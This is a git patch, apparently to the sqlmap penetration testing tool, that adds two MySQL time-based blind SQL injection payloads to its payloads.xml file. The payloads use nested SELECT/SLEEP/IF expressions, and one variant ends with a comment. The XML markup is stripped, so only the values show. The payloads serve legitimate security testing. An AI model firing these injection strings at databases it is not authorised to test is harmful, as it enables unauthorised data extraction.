From 66c2a7939761a54cefce5aead662bfd2f2716608 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Tue, 3 Feb 2015 15:14:41 +0000 Subject: [PATCH] added a time-based payload for MySQL when the simpler AND SLEEP(X) does not work --- xml/payloads.xml | 41 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) diff --git a/xml/payloads.xml b/xml/payloads.xml index c85aedd63..5fb16dc72 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -2454,6 +2454,47 @@ Formats: + + MySQL > 5.0.11 AND time-based blind (SELECT) + 5 + 1 + 1 + 1,2,3 + 1 + AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + > 5.0.11 +
+ + + + MySQL > 5.0.11 AND time-based blind (SELECT - comment) + 5 + 4 + 1 + 1,2,3 + 1 + AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + > 5.0.11 +
+ + MySQL > 5.0.11 AND time-based blind 5